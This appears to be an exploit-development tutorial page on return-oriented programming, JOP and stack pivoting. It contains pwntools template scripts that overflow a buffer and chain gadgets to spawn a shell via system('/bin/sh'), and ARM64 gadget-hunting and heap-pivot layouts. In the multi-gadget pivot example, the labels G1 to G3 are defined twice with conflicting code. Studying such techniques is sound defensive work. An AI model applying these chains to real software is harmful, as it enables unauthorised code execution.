Return-Oriented Programming (ROP) is an advanced exploitation technique used to circumvent security measures like No-Execute (NX) or Data Execution Prevention (DEP). Instead of injecting and executing shellcode, an attacker leverages pieces of code already present in the binary or in loaded libraries, known as "gadgets". Each gadget typically ends with a ret instruction and performs a small operation, such as moving data between registers or performing arithmetic operations. By chaining these gadgets together, an attacker can construct a payload to perform arbitrary operations, effectively bypassing NX/DEP protections.

How ROP Works

Control Flow Hijacking: First, an attacker needs to hijack the control flow of a program, typically by exploiting a buffer overflow to overwrite a saved return address on the stack.
Gadget Chaining: The attacker then carefully selects and chains gadgets to perform the desired actions. This could involve setting up arguments for a function call, calling the function (e.g., system("/bin/sh")), and handling any necessary cleanup or additional operations.
Payload Execution: When the vulnerable function returns, instead of returning to a legitimate location, it starts executing the chain of gadgets.
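
The three steps above can be illustrated with a toy model. The following sketch is not an exploit: it simulates a stack in Python, where each gadget is a function keyed by a made-up address and `ret` is modeled as popping the next value from the stack and jumping to it. All names and addresses are hypothetical.

```python
# Toy model of ROP: gadgets are Python functions keyed by made-up addresses.
# "ret" is modeled as: pop the next value off the stack and jump to it.

def run_chain(stack, gadgets):
    """Run gadget addresses from `stack` until it is empty or an address is unknown."""
    regs = {"eax": 0, "ebx": 0}
    trace = []
    stack = list(stack)           # index 0 is the top of the stack
    while stack:
        addr = stack.pop(0)       # ret: pop the next return address
        if addr not in gadgets:
            break                 # unknown address: a real process would crash here
        name, effect = gadgets[addr]
        effect(regs, stack)       # run the gadget body (it may pop data from the stack)
        trace.append(name)
    return regs, trace

# Hypothetical gadget addresses, chosen only for illustration
GADGETS = {
    0x1000: ("pop eax; ret", lambda r, s: r.update(eax=s.pop(0))),
    0x2000: ("pop ebx; ret", lambda r, s: r.update(ebx=s.pop(0))),
    0x3000: ("add eax, ebx; ret",
             lambda r, s: r.update(eax=(r["eax"] + r["ebx"]) & 0xFFFFFFFF)),
}

# The overwritten stack: gadget addresses interleaved with the data they pop
fake_stack = [0x1000, 40, 0x2000, 2, 0x3000]
regs, trace = run_chain(fake_stack, GADGETS)
print(regs, trace)
```

Each gadget only does a small piece of work; the computation comes from the order of the addresses placed on the stack.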

Tools

Typically, gadgets can be found using ROPgadget, ropper or directly from pwntools (ROP).
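
As a rough illustration of what these tools do internally, the sketch below scans a byte string for the x86 encodings of `pop <reg>; ret`. The sample bytes and the base address are made up, and real tools go much further (they disassemble backwards from every `ret` and handle many more instruction forms).

```python
# Minimal gadget scanner: looks for a one-byte "pop <reg>" followed by "ret" (0xc3).
# Opcodes 0x58..0x5f encode pop eax/ecx/edx/ebx/esp/ebp/esi/edi in 32-bit mode.
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET = 0xC3

def find_pop_ret(code: bytes, base: int = 0):
    """Return a list of (address, gadget_text) for every pop reg; ret in `code`."""
    found = []
    for i in range(len(code) - 1):
        op = code[i]
        if 0x58 <= op <= 0x5F and code[i + 1] == RET:
            found.append((base + i, f"pop {POP_REGS[op - 0x58]}; ret"))
    return found

# Made-up code bytes: nop; pop eax; ret; nop; pop ebx; ret
sample = bytes([0x90, 0x58, 0xC3, 0x90, 0x5B, 0xC3])
gadgets = find_pop_ret(sample, base=0x08048000)
for addr, text in gadgets:
    print(hex(addr), text)
```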

ROP Chain in x86 Example

x86 (32-bit) Calling conventions

cdecl: The caller cleans the stack. Function arguments are pushed onto the stack in reverse order (right to left).
stdcall: Similar to cdecl, but the callee is responsible for cleaning the stack.
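
For ROP this matters because a function reached through `ret` (rather than `call`) still expects a stack that looks like a normal call: a return address on top, followed by its arguments. A minimal sketch of that layout using only `struct`; the helper name and all addresses are placeholders.

```python
import struct

def cdecl_frame(func_addr: int, return_addr: int, *args: int) -> bytes:
    """Pack [func][return address][arg1][arg2]... as 32-bit little-endian words."""
    words = [func_addr, return_addr, *args]
    return b"".join(struct.pack("<I", w) for w in words)

# Placeholder values for illustration only
frame = cdecl_frame(0xDEADC0DE, 0x41414141, 0x0804A000)
print(frame.hex())
```

The first word is consumed by the `ret` that transfers control, so when the function starts it sees the fake return address followed by its argument.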

Finding Gadgets

First, let's assume we've identified the necessary gadgets within the binary or its loaded libraries. The gadgets we're interested in are:

pop eax; ret: This gadget pops the top value of the stack into the EAX register and then returns, allowing us to control EAX.
pop ebx; ret: Similar to the above, but for the EBX register, enabling control over EBX.
mov [ebx], eax; ret: Moves the value in EAX to the memory location pointed to by EBX and then returns. This is often called a write-what-where gadget.
Additionally, we have the address of the system() function available.
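
When the string you need is not already in memory, the three gadgets above can be combined to write it into a writable location first. A sketch of that idea, with placeholder gadget addresses and a hypothetical writable address (for example somewhere in .bss):

```python
import struct

# Placeholder addresses, not taken from any real binary
POP_EAX = 0x080481C9       # pop eax; ret
POP_EBX = 0x080481D1       # pop ebx; ret
MOV_EBX_EAX = 0x08048222   # mov [ebx], eax; ret
WRITABLE = 0x0804A040      # hypothetical writable location

def write_bytes(dest: int, data: bytes) -> list:
    """Return chain words that store `data` at `dest`, 4 bytes per round."""
    data += b"\x00" * (-len(data) % 4)           # pad to a multiple of 4
    chain = []
    for off in range(0, len(data), 4):
        value = struct.unpack("<I", data[off:off + 4])[0]
        chain += [POP_EAX, value,                # eax = next 4 bytes of the data
                  POP_EBX, dest + off,           # ebx = where to store them
                  MOV_EBX_EAX]                   # *ebx = eax
    return chain

chain = write_bytes(WRITABLE, b"/bin/sh\x00")
payload = b"".join(struct.pack("<I", w) for w in chain)
print(len(chain), payload.hex())
```

After these words run, WRITABLE would hold the string and could be used as the argument to system().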

ROP Chain

Using pwntools, we prepare the stack for the ROP chain as follows, aiming to execute system('/bin/sh'). Note how the chain is laid out:

A ret instruction for alignment purposes (optional)
Address of system function (supposing ASLR disabled and known libc, more info in Ret2lib)
Placeholder for the return address from system()
"/bin/sh" string address (parameter for system function)

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadc0de

# A plain ret gadget, typically found through analysis (hypothetical value)
ret_gadget = 0xcafebabe  # Address of a single ret instruction, it just pops the next address in the chain

# Construct the ROP chain
rop_chain = [
    ret_gadget,    # Optional: a lone ret, only needed if the stack has to be realigned
    system_addr,   # Address of system(). Execution will continue here after the ret gadget
    0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
    bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
]

# Flatten the rop_chain for use
rop_chain = b''.join(p32(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
offset = 76  # Hypothetical value, determine it for your target (e.g. with cyclic())
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

ROP Chain in x64 Example

x64 (64-bit) Calling conventions

Uses the System V AMD64 ABI calling convention on Unix-like systems, where the first six integer or pointer arguments are passed in the registers RDI, RSI, RDX, RCX, R8, and R9. Additional arguments are passed on the stack. The return value is placed in RAX.
Windows x64 calling convention uses RCX, RDX, R8, and R9 for the first four integer or pointer arguments, with additional arguments passed on the stack. The return value is placed in RAX.
Registers: 64-bit registers include RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, and R8 to R15.
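
For chain building, the practical consequence is which registers must be loaded before jumping to a function. A small sketch that maps integer or pointer arguments to registers and stack slots for both conventions; the helper name and the argument values are hypothetical.

```python
SYSV_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]   # System V AMD64
WIN64_ARG_REGS = ["rcx", "rdx", "r8", "r9"]                # Windows x64

def place_args(args, arg_regs):
    """Split integer/pointer `args` into register assignments and stack-passed values."""
    in_regs = dict(zip(arg_regs, args))
    on_stack = list(args[len(arg_regs):])
    return in_regs, on_stack

# A three-argument call with placeholder values
regs, stack = place_args([0x404000, 0, 0], SYSV_ARG_REGS)
print(regs, stack)

# Five arguments on Windows x64: the fifth one goes to the stack
win_regs, win_stack = place_args([1, 2, 3, 4, 5], WIN64_ARG_REGS)
print(win_regs, win_stack)
```

This sketch ignores floating-point arguments and the Windows shadow space.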

Finding Gadgets

For our purpose, let's focus on gadgets that will allow us to set the RDI register (to pass the "/bin/sh" string as an argument to system()) and then call the system() function. We'll assume we've identified the following gadgets:

pop rdi; ret: Pops the top value of the stack into RDI and then returns. Essential for setting our argument for system().
ret: A simple return, useful for stack alignment in some scenarios.

And we know the address of the system() function.

ROP Chain

Below is an example using pwntools to set up and execute a ROP chain aiming to execute system('/bin/sh') on x64:

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadbeefdeadbeef

# Gadgets (hypothetical values)
pop_rdi_gadget = 0xcafebabecafebabe  # pop rdi; ret
ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary

# Construct the ROP chain
rop_chain = [
    ret_gadget,        # Alignment gadget, if needed
    pop_rdi_gadget,    # pop rdi; ret
    bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
    system_addr        # Address of system(). Execution will continue here.
]

# Flatten the rop_chain for use
rop_chain = b''.join(p64(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
offset = 72  # Hypothetical value, determine it for your target (e.g. with cyclic())
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

In this example:

We utilize the pop rdi; ret gadget to set RDI to the address of "/bin/sh".
We directly jump to system() after setting RDI, with system()'s address in the chain.
ret_gadget is used for alignment if the target environment requires it, which is more common in x64 to ensure proper stack alignment before calling functions.

Stack Alignment

The x86-64 ABI requires the stack to be 16-byte aligned when a call instruction is executed. To optimize performance, libc uses SSE instructions (like movaps) that require this alignment. If the stack isn't aligned as expected when a function like system is entered from a ROP chain, the function will crash. To fix this, add a ret gadget before calling system in your ROP chain.
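
Whether the extra ret is needed can be worked out from the address where the chain starts. The sketch below assumes the usual System V situation, where a function expects RSP to be 8 modulo 16 on entry (16-byte aligned before the call pushed the return address). The chain address is a made-up value and the helper names are illustrative.

```python
def rsp_at_entry(chain_start: int, index_of_target: int) -> int:
    """RSP right after the ret that pops chain word `index_of_target` (8-byte words)."""
    return chain_start + 8 * (index_of_target + 1)

def is_aligned_for_call(rsp: int) -> bool:
    """On entry, a System V x86-64 function expects RSP % 16 == 8."""
    return rsp % 16 == 8

# Hypothetical address of the overwritten saved return address
chain_start = 0x7FFFFFFFE0A8

# Chain without padding: [pop rdi; ret, "/bin/sh", system] -> system is word 2
without_ret = is_aligned_for_call(rsp_at_entry(chain_start, 2))
# Chain with one extra ret in front: system becomes word 3
with_ret = is_aligned_for_call(rsp_at_entry(chain_start, 3))
print(without_ret, with_ret)
```

Each extra ret shifts RSP by 8 bytes, which is why a single one is enough to switch between the two cases.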

x86 vs x64 main difference

Tip

Since x64 uses registers for the first few arguments, it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. Both provide opportunities as well as challenges for exploit development with ROP.

ROP chain in ARM64

Regarding ARM64 Basics & Calling conventions, check the following page for this information:

{{#ref}} ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}

[!DANGER] It's important to notice that when jumping to a function using ROP in ARM64 you should jump to the 2nd instruction of the function (at least), to prevent it from storing the current frame pointer and link register (x29/x30) on the stack, which would end up in an eternal loop calling the function again and again.

Finding gadgets in system Dylds

The system libraries come compiled into a single file called dyld_shared_cache_arm64. This file contains all the system libraries in a compressed format. To download this file from the mobile device you can do:

scp [-J <domain>] root@10.11.1.1:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 .
# Use -J if connecting through Corellium via Quick Connect

Then, you can use a tool such as dyld-shared-cache-extractor to extract the actual libraries from the dyld_shared_cache_arm64 file:

brew install keith/formulae/dyld-shared-cache-extractor
dyld-shared-cache-extractor dyld_shared_cache_arm64 dyld_extracted

Now, in order to find interesting gadgets for the binary you are exploiting, you first need to know which libraries are loaded by the binary. You can use lldb for this:

lldb ./vuln
br s -n main
run
image list

Finally, you can use Ropper to find gadgets in the libraries you are interested in:

# Install
python3 -m pip install ropper --break-system-packages
ropper --file libcache.dylib --search "mov x0"

JOP - Jump Oriented Programming

JOP is a technique similar to ROP, but each gadget ends with an indirect jump (for example br or blr on ARM64) instead of a RET instruction. This can be particularly useful in situations where ROP is not feasible, such as when there are no suitable gadgets available. It is commonly used on ARM architectures, where the ret instruction is not as common as on x86/x64.
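
On ARM64 the difference is visible in the last instruction of a gadget. The sketch below classifies a 32-bit instruction word as `ret`, `br` or `blr` based on the A64 encodings of the unconditional register branches. The helper names are illustrative and the sample bytes are hand-assembled.

```python
import struct

# A64 "unconditional branch (register)" encodings, with Rn in bits 5..9:
#   br  xN -> 0xD61F0000 | (N << 5)
#   blr xN -> 0xD63F0000 | (N << 5)
#   ret xN -> 0xD65F0000 | (N << 5)   (plain "ret" uses x30)
TERMINATORS = {0xD61F0000: "br", 0xD63F0000: "blr", 0xD65F0000: "ret"}

def classify(word: int):
    """Return e.g. 'br x2' if `word` can end a ROP/JOP gadget, else None."""
    base = word & 0xFFFFFC1F          # clear the Rn field
    if base not in TERMINATORS:
        return None
    return f"{TERMINATORS[base]} x{(word >> 5) & 0x1F}"

def terminators(code: bytes):
    """Yield (offset, text) for every gadget-ending instruction in `code`."""
    for off in range(0, len(code) - 3, 4):       # A64 instructions are 4 bytes
        text = classify(struct.unpack_from("<I", code, off)[0])
        if text:
            yield off, text

# nop; br x2; ret
sample = struct.pack("<III", 0xD503201F, 0xD61F0040, 0xD65F03C0)
result = list(terminators(sample))
print(result)
```

Pointer-authenticated variants such as retab use different encodings and are not matched by this sketch.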

You can use rop tools to find JOP gadgets also, for example:

cd usr/lib/system # (macOS or iOS) Let's check in these libs inside the dyld_shared_cache_arm64
ropper --file *.dylib --search "ldr x0, [x0" # Supposing x0 is pointing to the stack or heap and we control some space around there, we could search for Jop gadgets that load from x0

Let's see an example:

There is a heap overflow that allows us to overwrite a function pointer stored in the heap that will be called.
- x0 is pointing to the heap where we control some space
From the loaded system libraries we find the following gadgets:

0x00000001800d1918: ldr x0, [x0, #0x20]; ldr x2, [x0, #0x30]; br x2; 
0x00000001800e6e58: ldr x0, [x0, #0x20]; ldr x3, [x0, #0x10]; br x3;

We can use the first gadget to load x0 with a pointer to /bin/sh (stored in the heap) and then load x2 from x0 + 0x30 with the address of system and jump to it.
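
A sketch of how the controlled heap region could be laid out for the first gadget, followed by a small simulation of its two loads. The heap base and the address of system are placeholders, and placing the string at offset 0x28 is just one possible choice.

```python
import struct

HEAP = 0x0000000100200000      # hypothetical address held in x0
SYSTEM = 0x00000001800A1B2C    # placeholder for the address of system()

buf = bytearray(b"A" * 0x60)
new_x0 = HEAP + 0x28                              # where "/bin/sh" will live
struct.pack_into("<Q", buf, 0x20, new_x0)         # read by: ldr x0, [x0, #0x20]
buf[0x28:0x30] = b"/bin/sh\x00"                   # x0 now points to the string
struct.pack_into("<Q", buf, 0x28 + 0x30, SYSTEM)  # read by: ldr x2, [x0, #0x30]

def load64(addr: int) -> int:
    """Read a 64-bit value from the fake heap at absolute address `addr`."""
    return struct.unpack_from("<Q", buf, addr - HEAP)[0]

# Simulate the gadget: ldr x0, [x0, #0x20]; ldr x2, [x0, #0x30]; br x2
x0 = load64(HEAP + 0x20)
x2 = load64(x0 + 0x30)
arg = bytes(buf[x0 - HEAP:x0 - HEAP + 8])
print(hex(x0), hex(x2), arg)
```

When the gadget reaches br x2, x0 holds the address of the string and x2 the address of system.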

Stack Pivot

Stack pivoting is a technique used in exploitation to change the stack pointer (RSP in x64, SP in ARM64) to point to a controlled area of memory, such as the heap or a buffer on the stack, where the attacker can place their payload (usually a ROP/JOP chain).

Examples of Stack Pivoting chains:

Example just 1 gadget:

mov sp, x0; ldp x29, x30, [sp], #0x10; ret;

The `mov sp, x0` instruction sets the stack pointer to the value in `x0`, effectively pivoting the stack to a new location. The subsequent `ldp x29, x30, [sp], #0x10; ret;` instruction loads the frame pointer and return address from the new stack location and returns to the address in `x30`.

I found this gadget in libunwind.dylib
If x0 points to a heap you control, you can control the stack pointer and move the stack to the heap, and therefore you will control the stack.

0000001c61a9b9c:
    ldr x16, [x0, #0xf8];    // Control x16
    ldr x30, [x0, #0x100];   // Control x30
    ldp x0, x1, [x0];        // Control x1
    mov sp, x16;             // Control sp    
    ret;                     // ret will jump to x30, which we control

To use this gadget you could place something like this in the heap:
  <address of x0 to keep x0>     # ldp x0, x1, [x0]
  <address of gadget>            # Let's suppose this is the overflowed pointer that allows to call the ROP chain
  "A" * 0xe8 (0xf8-16)           # Fill until x0+0xf8
  <address x0+16>                # Let's point SP to x0+16 to control the stack
  <next gadget>                  # This will go into x30, which will be called with ret (so the address of the 2nd gadget)
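
The same layout written as a Python sketch, so the offsets can be checked. The heap address and both gadget addresses are placeholders.

```python
import struct

X0 = 0x0000000100300000            # hypothetical heap address held in x0
PIVOT_GADGET = 0x0000000180001000  # placeholder for the address of the pivot gadget
NEXT_GADGET = 0x0000000180002000   # placeholder for the gadget run after the pivot

layout = b"".join([
    struct.pack("<Q", X0),            # [x0+0x00] -> x0 (keeps x0 unchanged)
    struct.pack("<Q", PIVOT_GADGET),  # [x0+0x08] -> x1, the overflowed pointer in this example
    b"A" * 0xE8,                      # padding up to x0+0xf8
    struct.pack("<Q", X0 + 16),       # [x0+0xf8] -> x16 -> new SP
    struct.pack("<Q", NEXT_GADGET),   # [x0+0x100] -> x30, target of the final ret
])

new_sp = struct.unpack_from("<Q", layout, 0xF8)[0]
new_lr = struct.unpack_from("<Q", layout, 0x100)[0]
print(len(layout), hex(new_sp), hex(new_lr))
```

In a real payload the padding that starts at x0+16 would hold the words consumed by the following gadgets, since SP points there after the pivot.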

Example multiple gadgets:

// G1: Typical PAC epilogue that restores frame and returns
// (seen in many leaf/non-leaf functions)
G1:
    ldp     x29, x30, [sp], #0x10     // restore FP/LR
    autiasp                          // **PAC check on LR**
    retab                            // **PAC-aware return**

// G2: Small helper that (dangerously) moves SP from FP
// (appears in some hand-written helpers / stubs; good to grep for)
G2:
    mov     sp, x29                  // **pivot candidate**
    ret

// G3: Reader on the new stack (common prologue/epilogue shape)
G3:
    ldp     x0, x1, [sp], #0x10      // consume args from "new" stack
    ret

G1:
    stp x8, x1, [sp]  // Store at [sp] → value of x8 (attacker controlled) and at [sp+8] → value of x1 (attacker controlled)
    ldr x8, [x0]      // Load x8 with the value at address x0 (controlled by attacker, address of G2)
    blr x8            // Branch to the address in x8 (controlled by attacker)  

G2:
    ldp x29, x30, [sp], #0x10  // Loads x8 -> x29 and x1 -> x30. The value in x1 is the value for G3
    ret
G3:
    mov sp, x29       // Pivot the stack to the address in x29, which was x8, and was controlled by the attacker, possibly pointing to the heap
    ret

Protections Against ROP and JOP

ASLR & PIE: These protections make ROP harder to use, as the addresses of the gadgets change between executions.
Stack Canaries: In the case of a BOF, the stored stack canary must be bypassed in order to overwrite return pointers and launch a ROP chain.
Lack of Gadgets: If there aren't enough gadgets it won't be possible to generate a ROP chain.
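
With ASLR or PIE, gadget addresses are usually expressed as offsets and rebased once an address has been leaked. A minimal sketch of that arithmetic, where the leaked value and all offsets are invented for illustration:

```python
# All numbers below are invented; real offsets come from the target's libc.
PUTS_OFFSET = 0x080E50        # offset of puts inside libc (hypothetical)
SYSTEM_OFFSET = 0x050D70      # offset of system inside libc (hypothetical)
POP_RDI_OFFSET = 0x02A3E5     # offset of a pop rdi; ret gadget (hypothetical)

def rebase(leaked_puts: int) -> dict:
    """Derive runtime addresses from one leaked libc pointer."""
    base = leaked_puts - PUTS_OFFSET
    if base & 0xFFF:
        raise ValueError("libc base is not page aligned, leak or offset is wrong")
    return {
        "base": base,
        "system": base + SYSTEM_OFFSET,
        "pop_rdi": base + POP_RDI_OFFSET,
    }

addrs = rebase(0x7F3A1C280E50)    # pretend this value was leaked at runtime
print({k: hex(v) for k, v in addrs.items()})
```

The page-alignment check is a cheap sanity test: a computed base that is not page aligned usually means the wrong libc version or a bad leak.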

ROP based techniques

Notice that ROP is just a technique to execute arbitrary code. Based on ROP, a lot of Ret2XXX techniques were developed:

Ret2lib: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like system('/bin/sh')).

{{#ref}} ret2lib/ {{#endref}}

Ret2Syscall: Use ROP to prepare a call to a syscall, e.g. execve, and make it execute arbitrary commands.

{{#ref}} rop-syscall-execv/ {{#endref}}

EBP2Ret & EBP Chaining: The first abuses EBP instead of EIP to control the flow, and the second is similar to Ret2lib, but in this case the flow is controlled mainly with EBP addresses (although it's also needed to control EIP).

{{#ref}} ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md {{#endref}}

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions
https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html
- 64 bit, PIE and NX enabled, no canary, overwrite RIP with a vsyscall address with the sole purpose of returning to the next address in the stack, which will be a partial overwrite of the address to get the part of the function that leaks the flag
https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html